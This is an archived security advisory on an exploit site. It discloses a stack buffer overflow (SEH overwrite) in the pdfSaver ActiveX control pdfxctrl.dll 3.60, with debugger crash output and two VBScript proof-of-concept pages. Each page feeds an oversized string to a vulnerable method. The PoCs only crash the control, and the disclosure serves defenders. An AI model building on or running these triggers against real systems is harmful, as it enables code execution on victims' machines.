what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Tracker Software pdfSaver ActiveX 3.60 Buffer Overflow

Tracker Software pdfSaver ActiveX 3.60 Buffer Overflow
Posted Jan 30, 2012
Authored by LiquidWorm | Site zeroscience.mk

Tracker Software pdfSaver ActiveX control (pdfxctrl.dll) version 3.60.0128 suffers from stack buffer overflow vulnerability.

tags | exploit, overflow, activex
SHA-256 | 1f74a1a4ce723616f317b2c385cfb28c0333209fe68e3f334202488fee4929f5

Tracker Software pdfSaver ActiveX 3.60 Buffer Overflow

Change Mirror Download

Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH)


Vendor:
-------
Tracker Software Products Ltd.


Product web page:
-----------------
http://www.tracker-software.com


Affected version:
-----------------
3.60.0128


Summary:
--------
PDF-Saver Technology is a unique new feature of PDF-XChange software
which allows printing jobs to be combined prior to the final PDF file
being generated - (e.g. to join 3 pages of Excel spreadsheet, 5 slides
of PowerPoint presentation and 10 pages of Word document into one PDF
document).


Description:
------------
The PDF Printer Preferences ActiveX suffers from a buffer overflow
vulnerability. When a large buffer is sent to the sub_path item of the
StoreInRegistry function, and the sub_key item of the InitFromRegistry
function, in pdfxctrl.dll module, we get a SEH overwrite. An attacker
can gain access to the system of the affected node and execute arbitrary
code.


------------------------------------------------------------------------

(1fac.1ea8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0013e9e0 ebx=00000003 ecx=0000008c edx=00001815 esi=0013cd74 edi=0013fffd
eip=7c834d8f esp=0013b75c ebp=0013b780 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
kernel32!lstrcatA+0x36:
7c834d8f f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:000> !exchain
0013b770: kernel32!_except_handler3+0 (7c839ac0)
CRT scope 0, filter: kernel32!lstrcatA+45 (7c84086d)
func: kernel32!lstrcatA+49 (7c840876)
0013f1ac: 41414141
Invalid exception stack at 41414141
0:000> d esp
0013b75c 2a 30 00 00 cc 63 18 00-03 00 00 00 5c b7 13 00 *0...c......\...
0013b76c 2a 30 00 00 ac f1 13 00-c0 9a 83 7c a8 4d 83 7c *0.........|.M.|
0013b77c 00 00 00 00 e4 ed 13 00-e7 d8 01 10 e0 e9 13 00 ................
0013b78c 90 b7 13 00 41 41 41 41-41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA
0013b79c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0013b7ac 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0013b7bc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0013b7cc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA

------------------------------------------------------------------------


Tested on:
----------
Microsoft Windows XP Professional SP3 (EN)


Vulnerability discovered by:
----------------------------
Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk


Advisory ID:
------------
ZSL-2012-5067


Advisory URL:
-------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5067.php



25.01.2012


PoC (COMRaider):
----------------

<object classid='clsid:2EE01CFA-139F-431E-BB1D-5E56B4DCEC18' id='zsl' />
<script language='vbscript'>

targetFile = "C:\PDF-XChange\pdfSaver\pdfxctrl.dll"
prototype = "Sub StoreInRegistry ( ByVal page_id As PdfPrinterDialogPage , ByVal sub_path As String )"
memberName = "StoreInRegistry"
progid = "pdfxctrlLib.PdfPrinterPreferences"
argCount = 2

arg1=1
arg2=String(6164, "A")

zsl.StoreInRegistry arg1 ,arg2

</script>

--------------------

<object classid='clsid:2EE01CFA-139F-431E-BB1D-5E56B4DCEC18' id='zsl' />
<script language='vbscript'>

targetFile = "C:\PDF-XChange\pdfSaver\pdfxctrl.dll"
prototype = "Sub InitFromRegistry ( ByVal page_id As PdfPrinterDialogPage , ByVal sub_key As String )"
memberName = "InitFromRegistry"
progid = "pdfxctrlLib.PdfPrinterPreferences"
argCount = 2

arg1=1
arg2=String(14356, "A")

zsl.InitFromRegistry arg1 ,arg2

</script>
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close